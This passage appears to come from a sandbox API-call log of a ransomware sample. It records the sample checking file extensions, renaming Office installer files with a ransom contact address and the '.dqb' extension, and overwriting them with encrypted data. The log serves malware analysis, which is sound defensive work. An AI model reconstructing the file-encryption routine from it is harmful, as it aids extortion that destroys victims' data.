lpOverlapped=0x0) returned 1 [0041.998] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x400a4f0 | out: hHeap=0x570000) returned 1 [0041.998] CloseHandle (hObject=0x17c) returned 1 [0041.998] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0041.998] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0041.998] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0041.998] lstrlenW (lpString=".doc") returned 4 [0041.998] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.998] lstrlenW (lpString=".docx") returned 5 [0041.998] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.998] lstrlenW (lpString=".pdf") returned 4 [0041.998] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.998] lstrlenW (lpString=".xls") returned 4 [0041.998] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.998] lstrlenW (lpString=".xlsx") returned 5 [0041.998] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.998] lstrlenW (lpString=".ppt") returned 4 [0041.998] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0041.999] lstrlenW (lpString=".zip") returned 4 [0041.999] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.999] lstrlenW (lpString=".rar") returned 4 [0041.999] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.999] lstrlenW (lpString=".bz2") returned 4 [0041.999] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.999] lstrlenW (lpString=".7z") returned 3 [0041.999] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0041.999] lstrlenW (lpString=".dbf") returned 4 [0041.999] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0041.999] lstrlenW (lpString=".1cd") returned 4 [0041.999] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0041.999] lstrlenW (lpString=".jpg") returned 4 [0041.999] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0041.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0041.999] lstrlenW (lpString=".doc") returned 4 [0041.999] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.999] lstrlenW (lpString=".docx") returned 5 [0041.999] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.999] lstrlenW (lpString=".pdf") returned 4 [0041.999] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.999] lstrlenW (lpString=".xls") returned 4 [0041.999] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.999] lstrlenW (lpString=".xlsx") returned 5 [0041.999] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.999] lstrlenW (lpString=".ppt") returned 4 [0041.999] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0041.999] lstrlenW (lpString=".zip") returned 4 [0041.999] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.999] lstrlenW (lpString=".rar") returned 4 [0042.000] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.000] lstrlenW (lpString=".bz2") returned 4 [0042.000] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.000] lstrlenW (lpString=".7z") returned 3 [0042.000] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.000] lstrlenW (lpString=".dbf") returned 4 [0042.000] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.000] lstrlenW (lpString=".1cd") returned 4 [0042.000] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0042.000] lstrlenW (lpString=".jpg") returned 4 [0042.000] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.000] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0042.000] lstrlenW (lpString="VisioMUI.msi") returned 12 [0042.000] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0042.000] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=2797568) returned 1 [0042.000] CloseHandle (hObject=0x17c) returned 1 [0042.001] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi")) returned 0x2020 [0042.001] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.001] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0042.001] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0042.001] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0042.001] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.001] ReadFile (in: hFile=0x17c, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.005] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.005] ReadFile (in: hFile=0x17c, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.014] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.014] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.014] ReadFile (in: hFile=0x17c, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.028] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.028] WriteFile (in: hFile=0x17c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0042.376] SetEndOfFile (hFile=0x17c) returned 1 [0042.376] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x400a4f0 [0042.376] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.376] WriteFile (in: hFile=0x17c, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.377] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.377] WriteFile (in: hFile=0x17c, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.382] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.382] WriteFile (in: hFile=0x17c, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.384] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x400a4f0 | out: hHeap=0x570000) returned 1 [0042.384] CloseHandle (hObject=0x17c) returned 1 [0042.384] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0042.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.385] lstrlenW (lpString=".doc") returned 4 [0042.385] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.385] lstrlenW (lpString=".docx") returned 5 [0042.385] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.385] lstrlenW (lpString=".pdf") returned 4 [0042.385] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.385] lstrlenW (lpString=".xls") returned 4 [0042.385] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.385] lstrlenW (lpString=".xlsx") returned 5 [0042.385] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.385] lstrlenW (lpString=".ppt") returned 4 [0042.385] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.385] lstrlenW (lpString=".zip") returned 4 [0042.385] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.385] lstrlenW (lpString=".rar") returned 4 [0042.385] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.385] lstrlenW (lpString=".bz2") returned 4 [0042.385] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.385] lstrlenW (lpString=".7z") returned 3 [0042.385] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.385] lstrlenW (lpString=".dbf") returned 4 [0042.385] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.385] lstrlenW (lpString=".1cd") returned 4 [0042.385] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.385] lstrlenW (lpString=".jpg") returned 4 [0042.386] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.386] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.386] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.386] lstrlenW (lpString=".doc") returned 4 [0042.386] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.386] lstrlenW (lpString=".docx") returned 5 [0042.386] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.386] lstrlenW (lpString=".pdf") returned 4 [0042.386] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.386] lstrlenW (lpString=".xls") returned 4 [0042.386] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.386] lstrlenW (lpString=".xlsx") returned 5 [0042.386] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.386] lstrlenW (lpString=".ppt") returned 4 [0042.386] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.386] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.386] lstrlenW (lpString=".zip") returned 4 [0042.386] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.386] lstrlenW (lpString=".rar") returned 4 [0042.386] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.386] lstrlenW (lpString=".bz2") returned 4 [0042.386] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.386] lstrlenW (lpString=".7z") returned 3 [0042.386] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.386] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.386] lstrlenW (lpString=".dbf") returned 4 [0042.386] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.386] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.386] lstrlenW (lpString=".1cd") returned 4 [0042.386] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.386] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0042.386] lstrlenW (lpString=".jpg") returned 4 [0042.386] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.387] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0042.387] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0042.387] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0042.396] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=2511872) returned 1 [0042.396] CloseHandle (hObject=0x17c) returned 1 [0042.396] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi")) returned 0x2020 [0042.396] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.396] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0042.397] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0042.397] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0042.397] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.397] ReadFile (in: hFile=0x17c, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.413] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.415] ReadFile (in: hFile=0x17c, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.447] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.447] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.447] ReadFile (in: hFile=0x17c, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.672] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.672] WriteFile (in: hFile=0x17c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0042.692] SetEndOfFile (hFile=0x17c) returned 1 [0042.692] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3ef2068 [0042.692] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.692] WriteFile (in: hFile=0x17c, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.694] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.694] WriteFile (in: hFile=0x17c, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.699] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.699] WriteFile (in: hFile=0x17c, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.702] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ef2068 | out: hHeap=0x570000) returned 1 [0042.702] CloseHandle (hObject=0x17c) returned 1 [0042.702] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0042.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.702] lstrlenW (lpString=".doc") returned 4 [0042.703] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.703] lstrlenW (lpString=".docx") returned 5 [0042.703] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.703] lstrlenW (lpString=".pdf") returned 4 [0042.703] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.703] lstrlenW (lpString=".xls") returned 4 [0042.703] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.703] lstrlenW (lpString=".xlsx") returned 5 [0042.703] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.703] lstrlenW (lpString=".ppt") returned 4 [0042.703] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.703] lstrlenW (lpString=".zip") returned 4 [0042.703] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.703] lstrlenW (lpString=".rar") returned 4 [0042.703] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.703] lstrlenW (lpString=".bz2") returned 4 [0042.703] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.703] lstrlenW (lpString=".7z") returned 3 [0042.703] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.703] lstrlenW (lpString=".dbf") returned 4 [0042.703] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.703] lstrlenW (lpString=".1cd") returned 4 [0042.703] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.703] lstrlenW (lpString=".jpg") returned 4 [0042.703] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.703] lstrlenW (lpString=".doc") returned 4 [0042.703] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.703] lstrlenW (lpString=".docx") returned 5 [0042.703] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.703] lstrlenW (lpString=".pdf") returned 4 [0042.704] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.704] lstrlenW (lpString=".xls") returned 4 [0042.704] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.704] lstrlenW (lpString=".xlsx") returned 5 [0042.704] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.704] lstrlenW (lpString=".ppt") returned 4 [0042.704] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.704] lstrlenW (lpString=".zip") returned 4 [0042.704] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.704] lstrlenW (lpString=".rar") returned 4 [0042.704] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.704] lstrlenW (lpString=".bz2") returned 4 [0042.704] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.704] lstrlenW (lpString=".7z") returned 3 [0042.704] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.704] lstrlenW (lpString=".dbf") returned 4 [0042.704] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.704] lstrlenW (lpString=".1cd") returned 4 [0042.704] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.704] lstrlenW 